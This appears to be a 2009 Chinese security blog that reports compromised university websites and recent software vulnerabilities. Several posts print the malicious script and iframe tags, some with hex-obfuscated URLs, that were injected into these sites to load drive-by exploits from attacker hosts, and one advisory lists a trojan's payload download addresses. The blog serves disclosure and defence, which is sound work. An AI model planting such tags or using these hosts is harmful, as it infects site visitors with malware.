郑前方

八月 13, 2009

近期被挂马的教育网网站

类归于：未分类 — starry @ 4:42 下午

复旦大学先进材料实验室 http://www.lam.fudan.edu.cn/

挂马代码：
<script src=http://%77%2E%73%69%79%6F%75%2E%6F%72%67%2E%63%6E>
<iframe src=http://xxo2.3322.org/dszq/2.htm>
<iframe src=http://f3jiy.cn/x2/xx.html>（OFFICE 0DAY漏洞）
<iframe src=http://f3jiy.cn/x2/Td14.htm>
<script src=http://f3jiy.cn/x2/14.js>
<script src=http://f3jiy.cn/x2/15.js>
<script src=http://f3jiy.cn/x2/16.js>
<iframe src=http://f3jiy.cn/x2/yt.htm>
<iframe src=http://f3jiy.cn/x2/dxxz.htm>
<iframe src=http://f3jiy.cn/x2/yut.htm>
<script src=http://%77%2E%6A%73%67%75%61%6E%67%6A%69%2E%63%6E>
<iframe src=http://xxo2.3322.org/dszq/2.htm>
<script src=http://%77%2E%74%6C%69%6E%65%65%2E%63%6F%6D%2E%63%6E>
<iframe src=http://xxo2.3322.org/dszq/2.htm>

厦门大学中国语言文学系（http://chinese.xmu.edu.cn/ReadNews.asp?NewsID=754）
涉及的挂马代码：

| 评论 (0)

七月 13, 2009

包含最新DirectXShow漏洞攻击代码的教育网挂马网页

类归于：未分类 — starry @ 1:45 下午

以下是截止文章发布时仍然存在挂马链接的网页地址：
　　
中国人民大学
　　挂马网址：http://art.ruc.edu.cn/
挂马代码：{script src=http://%63%6B%74%36%2E%63%6E}{/script}

　　西南财经大学
　　挂马网址：http://riem.swufe.edu.cn/new/index.asp
挂马代码：{script src=http://%63%6B%74%31%2E%63%6E}{/script}

　　西安交通大学
　　挂马网址：http://nht.xjtu.edu.cn/nht/downpage.asp
挂马代码：{script src=http://%63%6B%74%36%2E%63%6E}{/script}

　　华东理工大学
　　挂马网址：http://snet.ecit.edu.cn/
挂马代码：{script src=http://%77%76%67%33%2E%63%6E}{/script}

　　西安电子科技大学
　　挂马网址：http://cs.xidian.edu.cn/view.asp?artid=303
挂马代码：{script src=http://%63%6B%74%36%2E%63%6E}{/script}

　　兰州大学
　　挂马网址：http://xpb.lzu.edu.cn/ReadNews.asp?NewsID=827
挂马代码：{script src=http://zsb.lyge.cn/z.js}{/script}

　　福州大学
　　挂马网址：http://wx.fzu.edu.cn/
挂马代码：{script src=http://zsb.lyge.cn/z.js}{/script}

　　中国石油大学
　　挂马网址：http://zyjs.upc.edu.cn/onews.asp?id=105
挂马代码：{script src=http://vert4.cn}{/script}

　　中国地质大学
　　挂马网址：http://rsc.cug.edu.cn/bsh/newslook.asp?id=3
挂马代码：{iframe src=http://wvg6.cn/ width=0 height=0}{/iframe}

　　广东外语外贸大学
　　挂马网址：http://jy.gdufs.edu.cn/jobThread/jobThread.php?id=2949
挂马代码：{script language=’JavaScript’ type=’text/JavaScript’ src=’http://%77%33%6F%67%2E%63%6E/%73%2E%6A%73′}{/script}

　　宁夏大学
　　挂马网址：http://xsc.nxu.edu.cn/page/news/view.asp?id=2167
挂马代码：{script src=http://%63%6B%74%36%2E%63%6E}{/script}

　　湖北工业大学
　　挂马网址：http://dean.hbut.edu.cn/ReadNews.asp?NewsID=466
挂马代码：{SCRIPT language=javaScript src=”http://zsb.lyge.cn/z.js” type=text/javascript}{/SCRIPT}

　　广西大学
　　挂马网址：http://www2.gxu.edu.cn/yjsy/others/zs/2009/fscx/index.asp
挂马代码：{script src=http://%77%76%67%37%2E%63%6E}{/script}

注：上述挂马网页地址来源于360的网站。

| 评论 (0)

七月 8, 2009

DirectShow mpeg-2格式文件解析漏洞（0day）

类归于：未分类 — starry @ 1:53 下午

一个windows DirectShow的0day漏洞正在网络上大面积的被利用来进行网页挂马攻击。漏洞存在于DirectShow相关的msvidctl.dll组件中，该组件解析畸形MPEG-2格式视频时存在一个堆栈溢出漏洞，用户访问特制的mpeg-2格式的文件时就可能导致漏洞被利用。
这个漏洞与前段时间公布的DirectX QuickTime媒体文件解析代码执行漏洞相类似，但是比上一个漏洞更容易利用。攻击者可以通过在IE浏览器中加载avascript的脚本程序来利用此漏洞，经过测试发现漏洞的攻击成功率非常的高。

目前微软已经针对该漏洞发布了警示通告，但还未发布补丁程序。用户可以使用http://www.microsoft.com/china/technet/security/advisory/972890.mspx上公布的临时解决办法来减轻漏洞的风险。

另外大部分的杀毒软件已经能够识别此类攻击代码。

| 评论 (0)

六月 12, 2009

绿坝软件被发现存在严重的安全漏洞

类归于：未分类 — starry @ 10:03 上午

美国密西根大学的网络安全人员研究发现即将在中国境内销售的pc中强制安装的绿坝软件存在严重的安全漏洞，由于软件使用定长的缓冲区处理网页的url使得攻击者如果提供一个超长的url就可能导致程序发生缓冲溢出错误，精心构造的数据可以使得攻击者通过网页来利用该漏洞，成功利用此漏洞可以在用户的系统上执行任意代码。由于绿坝程序编写的不规范性，与此类似的漏洞还在该软件中还有。
研究人员还发现绿坝软件用于图像识别的程序使用的是开源的OpenCV软件的图像识别库。而URL过滤黑名单使用的是美国商业软件CyberSitter的黑名单库。可笑的是可能由于疏忽，绿坝的黑名单库中居然还包含一篇2004年的CyberSitter的新闻，仅仅是因为该新闻使用了与黑名单库相同的后缀名。

参考链接：
http://www.cse.umich.edu/~jhalderm/pub/gd/

| 评论 (1)

五月 20, 2009

DNS解析错误

类归于：安全事件, 安全月报 — 标签：安全事件 — starry @ 2:35 下午

从昨天晚上(5月19日)开始,各运营商的DNS服务均出现无法正确解析的故障.至今天早上问题陆续自己消失.目前原因还不明,有消息称是因为dnspod遭受攻击造成的.
dnspod是目前国内最大的智能dns解析服务提供商,它为所服务的域名提供基于来源地址不同而解析不同的IP地址的服务,以此来提高网站的访问速度.
有消息称dnspod在18号晚22点开始遭受ddos攻击,导致服务中断.而baofeng.com的解析就放置的dnspod,dnspod不能用导致download.baofeng.com也无法解析,暴风影音软件不停的向用户端的dns发送请求,导致用户端的dns负载重无法提供正常的服务.

疑点:
1.dnspod是在18号晚被攻击,而dns出问题是在19号晚,时间上对不上?
2.客户端的少量请求很难拖挎服务器,除非能引起DNS的回环?
3.暴风影音软件为什么会集中在19号晚上发起域名解析请求?

看来原因还有待于进一步查明….

参考链接:
http://support.dnspod.com/index.php?_m=news&_a=viewnews&newsid=7

http://www.newsmth.net/bbscon.php?bid=124&id=73651

| 评论 (0)

五月 5, 2009

暴风影音软件的漏洞正在被积极利用

类归于：漏洞信息 — starry @ 4:41 下午

暴风影音是目前国内用户使用比较广泛的视频播放软件,它支持目前绝大多数的主流视频格式.
暴风影音mps.dll库所提供的MPS.StormPlayer.1 ActiveX控件没有正确的检查用户的输入,导致存在一个缓冲溢出漏洞.攻击者可以通过浏览器(如IE)来调用此控件,并向其提供超长的参数就可能导致漏洞被利用,成功的攻击可以让入侵者在用户的系统上执行任意代码.
目前此漏洞正在国内被积极利用来进行网页挂马攻击.

厂商到目前为止还没有针对该漏洞发布新版本或补丁程序,也没有很好的临时解决办法.建议用户在没有解决方案之前先卸载或停用影音风暴软件,并确保系统目录中不存在mps.dll动态库文件.

漏洞的参考信息:http://secunia.com/advisories/34944/

| 评论 (0)

三月 20, 2009

2009年1-3月份安全漏洞点评

类归于：未分类 — starry @ 5:22 下午

近期，需要我们特别关注的漏洞有如下几个。

1、微软IE 浏览器CFunctionPointer函数内存破坏漏洞（MS09-002）

（1）该漏洞对应CVE编号：CVE-2009-0075

（2）影响系统：

l Internet Explorer 7

l Internet Explorer 8

（3）漏洞信息：

IE浏览器的的CFunctionPointer函数中存在一个内存破坏漏洞，CFunctionPointer对象在其构造函数中没有正确地引用文档对象，导致该文档对象可能在CFunctionPointer对象释放前被释放，而CFunctionPointer函数会继续使用这个已经被销毁的文档对象。攻击者可以以特定序列附加并删除文档对象，从而触发内存破坏，这将导致攻击者可以以当前登录用户的权限执行任意代码（如下载木马运行等）。

（4）漏洞风险分析：

由于通过浏览器进行的攻击可以有效地穿透普通防火墙的阻挡，因此这类漏洞被利用来网页挂马的几率非常高。有监测数据显示该漏洞已经开始在网络上被频繁利用。另外需要说明的是这个漏洞与上期月报中提到的IE浏览器0day攻击漏洞（MS08-078）并不是同一个漏洞。

（5）解决办法：

厂商已经针对该漏洞发布了相应的安全公告和补丁程序，建议用户尽快安装相应的补丁程序，您可以通过windows的自动update功能或者是WSUS服务自动更新补丁程序，也可以手动下载补丁程序安装，补丁下载地址：http://www.microsoft.com/china/technet/security/bulletin/ms09-002.mspx

（6）参考链接：

http://www.microsoft.com/china/technet/security/bulletin/ms09-002.msp

2、RealPlayer IVR文件解析代码执行漏洞

（1）CVE编号：CVE-2009-0375、CVE-2009-0376

（2）影响系统：

l Real Networks RealPlayer 11

（3）漏洞信息：

IVR文件是Realplay软件专用的录音文件格式，RealPlayer的IVR文件处理例程中存在多个安全漏洞。如果攻击者更改了IVR文件中用于确定结构长度的字段的话，就可以触发堆溢出；如果在IVR文件中设置了超长的文件名长度值的话，就会向任意内存地址写入一个空字节，这将导致攻击者可以利用该漏洞在用户的系统上执行任意代码。

（4）漏洞风险分析：

Realplay提供了一个可以作用在windows资源管理器shell插件上的动态库文件（安装Realplay软件时会默认安装），用来在资源管理器中预览流媒体文件，这个漏洞同样存在于该动态库文件中。因此只要用户通过资源管理器预览了有问题的IVR文件，就可能导致执行任意代码。目前还暂时未检测到网络有该漏洞的攻击代码存在。

（5）解决办法：

目前厂商还没有提供相应的补丁程序，建议用户随时关注厂商的更新信息。http://www.real.com

在没有相应的补丁程序前，建议用户暂时卸载系统中的realplay软件，使用其他播放软件代替。

（6）参考链接：

http://www.securityfocus.com/bid/33652

3、Adobe Acrobat和Reader PDF文件处理缓冲区溢出漏洞

（1）CVE 编号：CVE-2009-0658

（2）影响系统：

l Adobe Acrobat

l Adobe Reader

（3）漏洞信息：

Adobe公司的Acrobat和Reader软件是我们最常用的PDF文件编辑和阅读软件.它们除了提供标准的PDF编辑和阅读功能外还提供相应的浏览器插件,用来使浏览器可以直接浏览PDF格式的文档.

Adobe的Acrobat和Reader软件在处理PDF格式文件时存在一个缓冲溢出漏洞,如果用户使用存在漏洞的Adobe软件查看特制的PDF文档时漏洞可能被利用从而触发缓冲溢出,导致执行任意代码.对于那些安装了浏览器插件的web浏览器在浏览这些特制的PDF文档时也会导致漏洞被利用.

（4）漏洞风险分析：

Adobe所提供的浏览器pdf插件并不仅仅只支持IE浏览器，它还支持大部分的其他主流WEB浏览器，这就使得利用该漏洞的攻击可以通过大部分的WEB浏览器来进行。目前利用该漏洞的攻击已经在网络上出现，并有增多的趋势。

（5）解决办法：

厂商已经针对该漏洞提供了相应的补丁程序，建议用户及时下载安装。补丁下载页面：

http://www.adobe.com/support/security/bulletins/apsb09-03.html

（6）参考链接：

http://www.adobe.com/support/security/advisories/apsa09-01.html

4、Adobe Flash Player无效对象引用远程代码执行漏洞

（1）CVE编号：CVE-2009-0520

（2）影响版本：

l Adobe Flash Player < 10.0.22.87

（3）漏洞信息：

Adobe Flash Player是目前使用最为广泛的Flash播放软件，它在处理Shockwave Flash文件时会试图创建特定的对象及多个指向该对象的引用，在处理完成之后会释放该对象并删除相关联的引用。但是程序在这个过程中可能会错误的保留关联引用而删除对象。那些被删除的对象位于未初始化的内存中，攻击者可以通过保留的关联引用控制该内存区以获得执行命令的权限。

（4）漏洞风险分析：

Adobe Flash Player是我们正常访问网页所必需的软件，超过90% 以上的互联网用户计算机上安装了该软件。如果该漏洞的攻击代码被发布出来，那它将可能成为应用最广泛的攻击程序。目前网络上还未监测到针对该漏洞的攻击。

（5）解决办法：

目前厂商已经在最新的版本（10.0.22.87）中修补了该漏洞。建议用户尽快安装最新的版本。下载地址：

http://get.adobe.com/flashplayer/

（6）参考连接：

http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=773

http://www.adobe.com/support/security/bulletins/apsb09-01.html

5、Excel无效对象引用代码执行漏洞

（1）CVE编号：CVE-2009-0238

（2）影响版本：

l Microsoft Office Excel 2000 Service Pack 3

l Microsoft Office Excel 2002 Service Pack 3

l Microsoft Office Excel 2003 Service Pack 3

l Microsoft Office Excel 2007 Service Pack 1

l Microsoft Office Excel Viewer 2003

l Microsoft Office Excel Viewer 2003 Service Pack 3

l Microsoft Office Excel Viewer

l 用于 Word、Excel 和 PowerPoint 2007 文件格式 Service Pack 1 的 Microsoft Office 兼容包

l Microsoft Office 2004 for Mac

（3）漏洞信息：

Excel软件中存在一个安全漏洞，当Excel打开了畸形的.xls文档的话，就可能会引用无效的对象，这可能导致攻击者以当前登录用户的权限执行任代码。

（4）漏洞风险分析：

目前这个漏洞正在被名为Trojan.Mdropper.AC的木马积极的利用。当木马运行时，会在系统留下以下文件：

%Temp%\rundll.exe

之后木马试图从以下地址下载更多的病毒文件：

[http://]61.59.24.55/sb.php?id=[19个随机ASCII字符]

[http://]61.59.24.45/sb.php?id=[19个随机ASCII字符]

[http://]61.221.40.63/sb.php?id=[19个随机ASCII字符]

（5）解决办法：

目前厂商还未提供相应的补丁程序，建议用户随时关心厂商的更新。

http://www.microsoft.com/technet/security/

在没有安装补丁之前，你可以使用以下的临时办法来减轻风险：

1. 当打开来自未知来源或不可信来源的文件时使用 Microsoft Office Isolated Conversion Environment (MOICE)

2. 使用 Microsoft Office 文件阻止策略禁止打开来自未知或不可信来源和位置的 Office 2003 以及较早版本的文档。下列注册表脚本可以用于设置文件阻止策略：

Office 2003

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Excel\Security\FileOpenBlock]

“BinaryFiles”=dword:00000001

2007 Office system

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\FileOpenBlock]

“BinaryFiles”=dword:00000001

（6）参考连接：

http://www.microsoft.com/china/technet/security/advisory/968272.mspx

6、Windows 内核中可能允许远程执行代码漏洞（MS09-006）

（1）CVE 编号：CVE-2009-0081、CVE-2009-0082、CVE-2009-0083

（2）影响系统：

l Microsoft Windows 2000 Service Pack 4

l Windows XP Service Pack 2 和 Windows XP Service Pack 3

l Windows XP Professional x64 Edition

l Windows XP Professional x64 Edition Service Pack 2

l Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2

l Windows Server 2003 x64 Edition 和 Windows Server 2003 x64 Edition Service Pack 2

l Windows Server 2003 SP1（用于基于 Itanium 的系统）

l Windows Server 2003 SP2（用于基于 Itanium 的系统）

l Windows Vista 和 Windows Vista Service Pack 1

l Windows Vista x64 Edition 和 Windows Vista x64 Edition Service Pack 1

l Windows Server 2008（用于 32 位系统）*

l Windows Server 2008（用于基于 x64 的系统）*

l Windows Server 2008（用于基于 Itanium 的系统）

（3）漏洞信息：

1、Windows 内核输入验证漏洞

Windows 内核中存在一个由于未能正确验证从用户模式通过 GDI 内核组件传递的输入而产生的远程执行代码漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

2 、Windows 内核句柄验证漏洞

Windows 内核中存在一个由于内核处理句柄的方式而产生的特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

3 、Windows 内核无效指针漏洞

Windows 内核中存在一个由于无法正确处理特制无效指针而产生的特权提升漏洞。成功利用此漏洞的攻击者可以运行内核模式中的任意代码。

（4）漏洞风险分析：

这些漏洞存在于windows的内核中，因此它的普遍性很高，攻击者可以通过一些能够包含图片的应用来利用该漏洞，如网络浏览、电子邮件、图片预览等。目前互联网上还未明显监测到利用该漏洞的攻击。

（5）解决办法：

厂商已经针对该漏洞提供了相应的补丁程序，建议用户及时安装相应的补丁程序。

（6）参考链接：

http://www.microsoft.com/china/technet/security/bulletin/ms09-006.mspx

| 评论 (0)

三月 5, 2009

博士对”卧槽泥马”的解释

类归于：未分类 — 标签：社会 — starry @ 5:10 下午

看看一个堂堂的博士对网络名词的解释:

摘自<解放军报>2009年2月23日第10版新论

提问者：丁莹（上海南京西路）
解答者：段凡（华东理工大学社会与公共管理学院博士）

　　问：日前有一项调查显示，26.3%的人表示因为金融危机推迟了跳槽计划；近七成白领决定做好手头工作，老老实实地“卧槽”。请问，卧槽具体是什么意思？如何做一个不虚有其表的“卧槽者”？

　　答：良禽择木而栖、“良马择槽而卧”，是社会流动的必然趋势，也是职场人士依据市场规律进行人力资源配置的方式。不过，如何“跳”，怎么“卧”，能否“一马当先”抑或“马失前蹄”，值得细细思量。

　　跳槽，本是旧上海的一句俗话，曾频繁出现在清末小说《海上花列传》中。现在，它的引申义是指职员自愿主动地请求辞职。卧槽一词，本为中国象棋里的一杀招，指的是进到底象前一格位置的马，既可将军，又可抽车，极其凶狠。但在职场语境中，它显然与“跳槽”相对应，指的是把握市场走向，司职分内工作，拒绝轻率跳槽，精于韬光养晦的行为。

　　不过，卧槽与跳槽并非完全对立，否则就可能变成一匹“卧槽泥马”。卧槽泥马出自《战国策》，形容虚有其表、窃居名位者，即使有相应的地位，其能力也不足以胜任，等同于烂泥扶不上墙。所以说，卧槽者不应成为“卧槽泥马”，卧槽也并非“卧以待毙”。职场人士大可不必草木皆兵，而要变被动为主动，视卧槽为蓄势待发、开创工作新局面的机会。

　　要不虚有其表地卧槽，有必要牢记以下两点准则：一是遵守职场规则，不要做一天和尚撞一天钟，而应在本职岗位上更加勤奋努力，以此来避免被动失业；二是找准定位，厘清自身职业目标和规划，在沉下心来做好本职工作的同时，积极补充和更新知识和技能，以便在经济复苏和职场回暖后成为一匹“骏马”。

评注:

这位可怜的博士兄台大概是接到问题后一看不会就赶忙上百度查,查到后没去考证,就抄下来了.好笑的是除了解放军报发表了外,人民网也转载了,不过后来删了,幸好有百度和google的快照.哈哈

网页快照

百度网友对”卧槽泥马”和”马勒戈壁”的调侃解释,很有文学功底的:

“卧槽泥马”:
　　　　⑴形容识人不明.表示明明其能力不足.但上位者因为种种原因或糊涂.任其肆意妄为.
　　　　⑵形容虚有其表,窃居名位者.表示即使给某人相应的地位.但其能力不足是无法改变的.(等同于烂泥扶不上墙.沐猴而冠)
　　　　⑶形容模仿不到家，反而不伦不类.
　　　　典故:出自《战国策．楚策四》
　　　　伯乐多良马.其有邻亚犁.曾与人言.”我亦善识马.有一骏马.伯乐不及.”人皆疑.欲观之.亚犁恐.乃以草泥置一卧马于槽中.众人视之笑其蠢.皆曰:”此何良驹.卧槽泥马尔.”
　　　　下面给出三个词义的例句：
　　　　1、红鸟这厮也能当上十二骑士，卧槽泥马啊；
　　　　2、阿斗烂泥扶不上墙，即使上将潘凤在身边也不能稳坐江山，卧槽泥马呀；
　　　　3、不会做就别做，PS个老虎照片也敢拿出来，真是卧槽泥马。

“马勒戈壁”
　　　　词义：比喻天下太平，不再用兵。现形容思想麻痹。
　　　　词音：mǎ le ge bi
　　　　出处：《尚书.武成》：“王来自商，至于丰，乃偃武修文，归马于戈壁之阳，放牛于桃林之野，示天下弗服。”
　　　　使用举例：其时天下太平已久，真个是马勒戈壁，刀枪入库；五谷丰登，万民乐业。★清.钱彩《说岳全传》第一回。

| 评论 (0)

二月 23, 2009

Adobe Acrobat和Reader PDF文件处理缓冲区溢出漏洞

类归于：漏洞信息 — starry @ 5:35 下午

影响系统:

Adobe Acrobat
Adobe Reader

漏洞信息:
Adobe公司的Acrobat和Reader软件是我们最常用的PDF文件编辑和阅读软件.它除了提供标准的PDF
阅读软件外还提供相应的插件,用来使浏览器可以直接浏览PDF格式的文档.
Adobe的pdf软件中被发现存在一个缓冲溢出漏洞,如果用户使用存在漏洞的Adobe软件查看特制
的PDF文档时漏洞可能被利用,从而执行任意代码.对于那些安装了浏览器插件的web浏览器在浏
览这些特制的PDF文档时也会导致漏洞被利用.
漏洞危害:
由于adobe用于浏览器的pdf插件也存在相同的漏洞,导致这个漏洞的可利用范围大大增加.
目前该漏洞已经开始在网络上被利用.
解决办法:
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获
取最新版本.

临时解决办法:
1.在Adobe Reader和Acrobat中禁用JavaScript   

禁用Javascript可以防范代码执行。可使用首选项菜单（编辑 -> 首选项 -> JavaScript
然后清除选择“启用Acrobat JavaScript”）来禁用Acrobat JavaScript。

2.在IE浏览器中禁用自动打开PDF文档：

Windows Registry Editor Version 5.00

   [HKEY_CLASSES_ROOT\AcroExch.Document.7]
   "EditFlags"=hex:00,00,00,00

  将以上内容保存为.reg为后缀的文件,并导入注册表！

3.禁止在WEB浏览器中显示PDF文档  

   1). 打开Adobe Acrobat Reader
   2). 打开“编辑”菜单
   3). 选择“首选项”
   4). 选择“Internet”部分
   5). 在复选框中清除“在浏览器中显示PDF
参考信息:
http://www.adobe.com/support/security/advisories/apsa09-01.html

| 评论 (0)

关注IE 7浏览器漏洞

类归于：未分类 — 标签：安全 — starry @ 5:09 下午

微软在09年02月份安全公告中公布的IE 7浏览器漏洞(MS09-002)的攻击代码已经在网络上公布,相应的攻击程序也已经开始被用来网页挂马.相信在随后的几天里,这类攻击的数量会呈上升趋势!

IE7漏洞(MS09-002)的相关信息请参见http://www.ccert.edu.cn/announce/show.php?handle=141

攻击程序的相关信息:

http://www.milw0rm.com/exploits/8079

http://www.milw0rm.com/exploits/8082

http://www.milw0rm.com/exploits/8077

| 评论 (0)

早前文章 »